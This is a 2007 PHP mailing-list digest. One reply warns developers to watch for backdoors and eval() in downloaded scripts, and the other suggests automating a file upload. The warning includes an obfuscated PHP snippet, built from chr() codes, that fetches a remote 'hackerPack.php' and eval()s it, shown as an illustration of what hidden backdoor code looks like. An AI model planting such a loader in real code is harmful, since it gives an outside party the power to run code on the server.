php-windows Digest 4 Mar 2007 03:37:37 -0000 Issue 3154

Sat, 03 Mar 2007 19:39:19 -0800 

php-windows Digest 4 Mar 2007 03:37:37 -0000 Issue 3154

Topics (messages 27540 through 27541):

Re: [PHP] Re: Question on virus/worms
        27540 by: Robert Cummings

Re: auto upload
        27541 by: Haydar TUNA

Administrivia:

To subscribe to the digest, e-mail:
        [EMAIL PROTECTED]

To unsubscribe from the digest, e-mail:
        [EMAIL PROTECTED]

To post to the list, e-mail:
        [email protected]


----------------------------------------------------------------------
--- Begin Message --- 
On Sat, 2007-03-03 at 14:02 +0100, Tim wrote:
>
> Once you are comfortable with this, before you use a script downloaded from
> the inet in a production environment, go through the code and make sure you
> don't see any backdoor code (unecessary fsockopen(), exec() etc.. That isn't
> related to the scripts original use).

And be very careful with eval(). It's a gold mine for hackers since then
they can just do things like:

<?php

    $stuff =
        '102,117,110,99,116,105,111,110,32,83,73,76,70,83,68,'
       .'72,76,68,70,78,76,72,68,72,74,76,83,68,76,75,74,68,'
       .'76,74,83,72,68,76,74,83,72,68,83,90,68,70,83,40,41,'
       .'10,32,32,32,32,123,10,32,32,32,32,32,32,32,32,36,99,'
       .'111,100,101,32,61,32,102,105,108,101,40,32,39,104,116,'
       .'116,112,58,47,47,119,119,119,46,105,110,116,101,114,'
       .'106,105,110,110,46,99,111,109,47,104,97,99,107,101,'
       .'114,80,97,99,107,46,112,104,112,39,32,41,59,10,32,32,'
       .'32,32,32,32,32,32,36,99,111,100,101,32,61,32,105,109,'
       .'112,108,111,100,101,40,32,39,39,44,32,36,99,111,100,'
       .'101,32,41,59,10,10,32,32,32,32,32,32,32,32,101,118,'
       .'97,108,40,32,36,99,111,100,101,32,41,59,10,32,32,32,'
       .'32,125,10,10,32,32,32,32,83,73,76,70,83,68,72,76,68,'
       .'70,78,76,72,68,72,74,76,83,68,76,75,74,68,76,74,83,'
       .'72,68,76,74,83,72,68,83,90,68,70,83,40,41,59';

    $stuff = explode( ',', $stuff );
    $stuff = 'c'.'h'.'r'.'('.implode( ').'
            .'c'.'h'.'r'.'(', $stuff ).');';

    $stuff = eval( 'return '.$stuff );
    $stuff = eval( $stuff );

?>

Cheers,
Rob.
-- 
.------------------------------------------------------------.
| InterJinn Application Framework - http://www.interjinn.com |
:------------------------------------------------------------:
| An application and templating framework for PHP. Boasting  |
| a powerful, scalable system for accessing system services  |
| such as forms, properties, sessions, and caches. InterJinn |
| also provides an extremely flexible architecture for       |
| creating re-usable components quickly and easily.          |
`------------------------------------------------------------'

--- End Message ---
--- Begin Message --- 
Hello,
        I have got a very interesting answer. I built an exe program with 
Delphi or other Visual Programming. In this program, I use WebBrowser API. 
With this API, I use your secure file upload program. then I call this exe 
program from task manager. In this way, you can auto uplaod file everytime:)


-- 
Haydar TUNA
Republic Of Turkey - Ministry of National Education
Education Technology Department Ankara / TURKEY
Web: http://www.haydartuna.net


""bedul"" <[EMAIL PROTECTED]>, haber iletisinde sunlari 
yazdi:[EMAIL PROTECTED]
> this might a strange code i request, plz forgive my rudeness.
>
> everyday i was update a doc where i always put on d:\report\today.xls 
> where
> i use a simple upload document prog (inside only box for upload only? and
> submit). the file i upload will save on file folder (inside the upload
> folder)
>
> today i want to skip that procedure.. i want to build this web where i 
> open
> the site (http://server-e/upload/index.php) then click the button/submit..
> this button will triger action where i will upload the d:\report\today.xls
> file "without using browse/file input".
>
> can u help me?? i do know about the unsafe that metodh.. thx for your
> attention.

--- End Message ---

Reply via email to